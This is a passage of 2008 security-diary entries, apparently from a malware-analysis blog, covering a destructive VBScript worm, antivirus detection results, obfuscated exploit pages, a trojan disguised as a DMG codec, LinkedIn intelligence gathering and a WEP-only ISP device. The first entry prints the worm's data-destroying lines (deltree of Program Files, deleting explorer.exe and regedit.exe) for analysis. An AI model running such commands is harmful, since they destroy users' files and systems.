yeah.WriteLine "cls"
yeah.WriteLine "deltree C:\Program Files\*.*"
yeah.Close

In other words, it tries to delete all the files under the Program Files directory. Besides this, it tries to delete two other files:

Set k = fso.GetFile("c:\windows\explorer.exe")
k.Delete
Set k = fso.GetFile("c:\windows\regedit.exe")
k.Delete

Due to Windows File Protection, this will fail, but we can see that the malware author decided to be very destructive (the worm replicates itself to all available shares and disks before this).

After playing with it I decided to see what's the AV coverage of this (simple) piece of malware … and the result was shocking. On VirusTotal, only 11 out of 32 AV detected it:

AntiVir     7.6.0.80      2008.04.03          VBS/Zapchast
AVG          7.5.0.516     2008.04.02          VBS/Small
BitDefender 7.2         2008.04.03          Win32.Ariss.A@mm
DrWeb        4.44.0.09170 2008.04.03          modification of VBS.Generic.458
eSafe        7.0.15.0      2008.04.01          VBS.Crystal
F-Secure     6.70.13260.0 2008.04.03          Type_Script
Kaspersky    7.0.0.125     2008.04.03          Type_Script
NOD32v2      2998          2008.04.03          VBS/SysLock.A
Panda        9.0.0.4       2008.04.02          Suspicious file
Rising      20.38.22.00   2008.04.02          Worm.Larisa.a
Webwasher-Gateway 6.6.2   2008.04.03          Script.Soad.2

As you can see, most major anti-virus programs missed this (very simple) piece of malware. We've sent the sample to them so hopefully they will start detecting it soon, but this is another example of why we must not ignore old(er) technologies that the bad guys still rely on.

Bojan

0 Comments

A bag of vulnerabilities (and fixes) in QuickTime

Apple released QuickTime version 7.4.5 which addresses 11 vulnerabilities. Vulnerabilities range from denial of service attacks, information leaks to (of course) remote code execution.

Since QuickTime for all operating systems is affected (Mac OS X, Windows XP, Vista), we recommend that you update as soon as possible.

More information about the update is available at http://support.apple.com/kb/HT1241 and files can be downloaded directly from http://www.apple.com/support/quicktime/.

Thanks to Juha-Matti for heads up.

Bojan

0 Comments

Mixed (VBScript and JavaScript) obfuscation

I recently had to analyze a compromised web site that was serving malware. The web site included an iframe (of course) that pointed to a script exploiting various vulnerabilities.

As you can probably already guess, the script was obfuscated, but this time I saw something relatively new (nothing ground breaking, but an interesting move).

The web page with the exploit was split into two parts: a VBScript part and a JavaScript part, as you can see below:

Script with VB and JS

Now, the interesting thing about this script is that the JavaScript part needs the VBScript part to finish the deobfuscation properly. If you look carefully at the screen shot above you can see the following parts:

The page starts with a VBScript. It defines some variables (mcvk, ybjfo, da) and then calls unescape() on a reversed string with certain characters replaced.
The result of the unescape() function is placed in a variable called togn. Now the VBScript part finishes and the JavaScript part starts.
This part again defines some empty variables (hq, bi) and then calls eval() on the togn variable.

The togn variable that was the result of the VBScript code actually contains JavaScript code that is needed for proper deobfuscation. The eval() call evaluates a string and executes it as if it was script code.

So, in order to deobfuscate this page we need to first process the VBScript part, paste the output into the togn variable and then execute the JavaScript part. Alternatively, we can use a debugger that works with both languages which means we have to use Internet Explorer on Windows.

If you've been reading our diaries you should already know how to deal with simple VBScript and JavaScript obfuscation (if not see http://isc.sans.org/diary.html?storyid=3351 and http://isc.sans.org/diary.html?storyid=2358 or you can check the SEC610 (http://www.zeltser.com/reverse-malware/) course Lenny teaches at SANS Institute, where I wrote the advanced web malware deobfuscation part).

Once the first part is deobfuscated, the togn variable will contain the following code:

The function goqod() gets called from the JavaScript code and is the one that handles the final deobfuscation (at the end the document.write call executes various exploits).

As this was relatively easy to deobfuscate, you might wonder why did the bad guys go that far and made things more complicated by using both VBScript and JavaScript. While I don't know the answer to this, my guess is that they are trying to prevent researchers from using automated honeypot/crawler machines based on JavaScript parsers (such as SpiderMonkey) from detecting the exploit. Executing these functions on a system that doesn't support VBScript will not return anything (the JavaScript code will fail due to a call to an inexistent function).

Besides making things more difficult for researchers, this "advanced" obfuscation also helps in evading AV detection. While the test on VT is not a real indicator (some AV programs have abilities to detect exploits better in browsers), when a scan of a file returns 2/32 as the result, that doesn't sound encouraging.

Bojan

2 Comments

Published: 2008-04-02

When is a DMG file not a DMG file

When it is malware?

Steve (a fellow handler) sent in a link to a DMG file. Several of us wondered how to analyze it and what it might contain. While we searched our memory I downloaded it and it was discovered not to be a DMG file at all.

adrien@tester:~/bad$ file jetcodec1000.dmg
jetcodec1000.dmg: PE executable for MS Windows (GUI) Intel 80386 32-bit, Nullsoft Installer self-extracting archive

Virustotal results aren't the greatess:

File jetcodec1000.dmg received on 04.03.2008 00:49:47 (CET)
Antivirus    Version    Last Update    Result
AhnLab-V3    2008.4.1.2    2008.04.02    -
AntiVir    7.6.0.80    2008.04.02    DR/Dldr.DNSChanger.Gen
AVG    7.5.0.516    2008.04.02    DNSChanger.AA
BitDefender    7.2    2008.04.03    Dropped:Trojan.Downloader.Zlob.ABOU
ClamAV    0.92.1    2008.04.02    Trojan.Zlob-2395
F-Prot    4.4.2.54    2008.04.02    W32/Trojan2.AIES
F-Secure    6.70.13260.0    2008.04.02    W32/Malware
Kaspersky    7.0.0.125    2008.04.03    Trojan.Win32.DNSChanger.arn
Norman    5.80.02    2008.04.02    W32/Malware
Prevx1    V2    2008.04.03    Generic.Dropper.xCodec
Symantec    10    2008.04.03    Trojan.Zlob
VBA32    3.12.6.3    2008.03.25    MalwareScope.Trojan.DnsChange.2
Webwasher-Gateway    6.6.2    2008.04.02    Trojan.Dropper.Dldr.DNSChanger.Gen
Additional information
File size: 232561 bytes
MD5: 7db1dded58e7856c4d0dcae14b3b870f
SHA1: 6dbc5ae729102e37a77735712dc17daef6b46916

The exe also has the same characteristics:

adebeaupre@host032:~/bad$ md5sum jetcodec1000.exe
555a43e71a62453b445087ef50781193 jetcodec1000.exe
adebeaupre@host032:~/bad$ md5sum jetcodec1000.dmg
555a43e71a62453b445087ef50781193 jetcodec1000.dmg

Obviously NOT a DMG file! Interesting that the site the file was downloaded from contained the following advertising blurbs:

XX is a multimedia software that allows access to Windows collection of multimedia drivers and integrates with any application using DirectShow and Microsoft Video for Windows. XX will highly increase quality of video files you play.

XX enhances your music listening experience by improving the sound quality of video files sound, MP3, internet radio, Windows Media and other music files. Renew stereo depth, add 3D surround sound, restore sound clarity, boost your audio levels, and produce deep, rich bass sounds.

Sounds like fun. Delivery via social engineering.

Cheers,
Adrien de Beaupré
Bell Canada

0 Comments

Published: 2008-04-02

Competitive intelligence gathering via LinkedIn's new Company Profile pages

Individuals looking to gather competitive intelligence have a new tool at their disposal: Company Profile pages on LinkedIn, which entered beta on March 20. The new feature, while useful to many, highlights the challenges of controlling the distribution of information about a company's inner-workings.

LinkedIn compiles company details, such as new hires, promotions, office locations, and career path information, by mining the data from LinkedIn users profiles. The auto-generated page offers an uncommon glimpse into the internal processes of the profiled company. The results are particularly impressive for small non-public organizations, because information about such entities is particularly challenging to obtain.

A LinkedIn Company Profile is a fertile ground for the individuals who gather competitive intelligence. Unfortunately, while some of them could be are pursuing generally-accepted business endeavours (e.g., sales prospecting, market analysis), others may have less-nefarious plans (e.g., corporate espionage, social engineering).

Examining a Sample Company Profile

Consider the following sample profile of a private company with less than 500 employees. I revised names, titles and other identifying details without altering the nature of the compiled information. The relevant excerpts from the sample profile are below; you can view the whole profile here.)

A profiler of Example Inc may be interested to note which people the company recently hired, and where they came from. A number of hires in a particular division may indicate a major strategy shift. Also, new hires may be particularly vulnerable to the profiler's advances, because they have not yet settled into their new roles.
The profiler may gain insight into the inner structure of the company by examining recent promotions and title changes. For example, the large number of changes 6 months ago suggests a major organizational change. Tracking this information over time helps map the company's organizational structure.
The Popular Profiles section lists employees who are seen "in the news, referenced in blogs, participating in industry groups," or are active on the Linkedin site. Such active individuals might welcome the opportunity to establish a new connection, and could be targeted for sales calls or social engineering scams.
Perhaps the most intriguing component of the profile is the one that outlines career paths for company employees. A profiler may observe where employees come from and head to. For example, it may be interesting to note if employees (and thus intellectual capital) leave for a competitor.
The section that lists the companies to which Example Inc employees are "most connected to" is powerful, because it may inadvertently point out the company's biggest suppliers or customers. (Employees often link to the people with whom they collaborate.) Many wish to keep this data private to conceal channel details. A profiler may also notice, for instance, if the company hires employees from its best customer.

To experiment with Company Profile pages, locate an individual's profile on LinkedIn and click on the company name in his work history.

Controlling Data Dissemination

There is little companies can do to prevent such details from leaking into the open. One possibility is to attempt limiting which information employees may disclose information on social networking websites such as LinkedIn. Organizations may consider issuing guidelines that advise employees against including certain data in their profiles. Companies with more controlling cultures, such as some financial institutions, will be more likely to succeed at this.

LinkedIn has indicated that in the future companies may be able to customize their profiles, although it is unclear the extent to which the companies will control the details shown there. It is also unclear how LinkedIn will determine who will be authorized to act on the company's behalf when editing the profile.

LinkedIn allows individuals to remove themselves from Company Profile pages, but this comes at a cost. To be removed, the person also has to give up the ability to notify his connections of all personal profile changes.

I applaud the innovative manner in which LinkedIn now provides insights at inner-workings of companies large and small. However, it is unfortunate that LinkedIn released this feature without allowing companies and individuals to granularly control how they are being profiled.

-- Lenny

Lenny Zeltser leads a security consulting team at SAVVIS Inc and teaches a malware analysis course at SANS Institute.

0 Comments

Published: 2008-04-01

Security in everyday life -- A true April Fools story

Handler story (not mine)--

There is an elderly couple from my church that have subscribed to the <name deleted> Satellite service for a number of years. <name deleted> has decided to drop their satellite service and go to an internet <name deleted> service instead.
So they notified all of their customers that they are turning off the satellite at the end of the month so a box is being mailed to them with easy instructions on how to connect it to their existing Internet service.... Easy, anyone can do it.. (Right). Anyway, the elderly couple got the box in the mail on Monday and attempted to connect it. The instructions were poor at best but they gave it a try. When they couldn't get it to work they called me and I went over last night to help them out. Easy instructions right? How long could it take? I got there and attempted to connection the gateway/router/cable modem/whatever you want to call it box to the existing wireless network in their house. I scanned for the network and wa-la came right up with the network.... put in the WPA key and it started the connect and came back with unable to connect, dhcp failed. I checked a couple of other things then called <name deleted> tech support. After waiting on hold for quite some time I was finally connected to a technician. I explained that I was attempting to connect the system and when I put in the WPA key it attempted to connect and then came back with the DHCP failure.

You are not going to believe what I was told. Yep, you got it, sorry you need to change your network to WEP. Our system only recognizes WEP. I could not believe what I was hearing. I informed him that the change was not going to happen on their network, explained to him why, and then explained to them how totally irresponsible they were being. He said that he totally agreed, however, the company that they are purchasing the hardware from does not know how to do anything but WEP. He said that they were working on figuring it out, but it isn't going to happen for a while. He said that he has only had a couple people that complained about the WEP thing and that they did change their security so that they could watch <name deleted>. He stated for the most part no one complains. And my response was.... do you suppose it is not because they don't care but rather that they don't know/understand. He said... yeah, you could be right.

And we wonder why we have so many issues on the net.

I'm out for the night, Adrien is here to take over.. Enjoy the podcast in the meantime!

Joel Esler

0 Comments

Published: 2008-04-01

April Fools Day

As a reminder, today is April 1st, a common day for the pranksters, the tricksters, and a great day to have fun. However, things to remember today, some of what you read on the interwebz today will be fake. So, remember to keep your humor about you today as you are out there today.

Joel Esler